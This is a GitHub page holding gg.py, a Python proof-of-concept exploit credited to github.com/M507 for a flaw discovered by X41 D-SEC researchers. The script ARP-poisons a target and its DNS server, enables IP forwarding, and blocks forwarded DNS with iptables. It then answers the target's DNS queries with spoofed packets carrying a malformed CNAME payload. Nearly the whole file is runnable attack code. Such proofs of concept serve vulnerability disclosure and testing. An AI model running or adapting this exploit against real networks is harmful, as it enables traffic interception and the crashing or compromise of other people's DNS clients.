-
Notifications
You must be signed in to change notification settings - Fork 0
/
gg.py
104 lines (94 loc) · 4.7 KB
/
gg.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
# This PoC is written by github.com/M507
# Discovered by X41 D-SEC GmbH, Luis Merino, Markus Vervier, Eric Sesterhenn
from scapy.all import *
from multiprocessing import Process
from binascii import hexlify, unhexlify
import argparse, time, os
def device_setup():
os.system("echo '1' >> /proc/sys/net/ipv4/ip_forward")
os.system("iptables -A FORWARD -p UDP --dport 53 -j DROP")
def ARPP(target, dns_server):
print("[*] Sending poisoned ARP packets")
target_mac = getmacbyip(target)
dns_server_mac = getmacbyip(dns_server)
while True:
time.sleep(2)
send(ARP(op=2, pdst=target, psrc=dns_server, hwdst=target_mac),verbose = 0)
send(ARP(op=2, pdst=dns_server, psrc=target, hwdst=dns_server_mac),verbose = 0)
def exploit(target):
print("[*] Listening ")
sniff (filter="udp and port 53 and host " + target, prn = process_received_packet)
"""
RFC schema
0 1 2 3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| LENGTH | ID |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|Q| OPCODE|A|T|R|R|Z|A|C| RCODE | QDCOUNT |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| ANCOUNT | NSCOUNT |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| ARCOUNT | QD |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| AN | NS |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| AR |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
Fig. DNS
"""
def process_received_packet(received_packet):
if received_packet[IP].src == target_ip:
if received_packet.haslayer(DNS):
if DNSQR in received_packet:
print("[*] the received packet: " + str(bytes_hex(received_packet)))
print("[*] the received DNS request: " + str(bytes_hex(received_packet[DNS].build())))
try:
# \/ the received DNS request
dns_request = received_packet[DNS].build()
null_pointer_index = bytes(received_packet[DNS].build()).find(0x00,12)
print("[*] debug: dns_request[:null_pointer_index] : "+str(hexlify(dns_request[:null_pointer_index])))
print("[*] debug: dns_request[null_pointer_index:] : "+str(hexlify(dns_request[null_pointer_index:])))
payload = [
dns_request[0:2],
b"\x81\x80\x00\x01\x00\x01\x00\x00\x00\x00",
dns_request[12:null_pointer_index+1],
dns_request[null_pointer_index+1:null_pointer_index+3],
dns_request[null_pointer_index+3:null_pointer_index+5],
b"\xC0\x0C\x00\x05\x00\x01\x00\x00\x0E\x10",
b"\x00\x0B\x18\x41\x41\x41\x41\x41\x41\x41",
b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41",
b"\x41\x41\x41\x41\x41\x41\x41\xC0\x04"
]
payload = b"".join(payload)
spoofed_pkt = (Ether()/IP(dst=received_packet[IP].src, src=received_packet[IP].dst)/\
UDP(dport=received_packet[UDP].sport, sport=received_packet[UDP].dport)/\
payload)
print("[+] dns answer: "+str(hexlify(payload)))
print("[+] full packet: " + str(bytes_hex(spoofed_pkt)))
sendp(spoofed_pkt, count=1)
print("\n[+] malicious answer was sent")
print("[+] exploited\n")
except:
print("\n[-] ERROR")
def main():
global target_ip
parser = argparse.ArgumentParser()
parser.add_argument("-t", "--target", help="IP address of the target")
parser.add_argument("-r", "--dns_server", help="IP address of the DNS server used by the target")
args = parser.parse_args()
target_ip = args.target
dns_server_ip = args.dns_server
device_setup()
processes_list = []
ARPPProcess = Process(target=ARPP,args=(target_ip,dns_server_ip))
exploitProcess = Process(target=exploit,args=(target_ip,))
processes_list.append(ARPPProcess)
processes_list.append(exploitProcess)
for process in processes_list:
process.start()
for process in processes_list:
process.join()
if __name__ == '__main__':
target_ip = ""
main()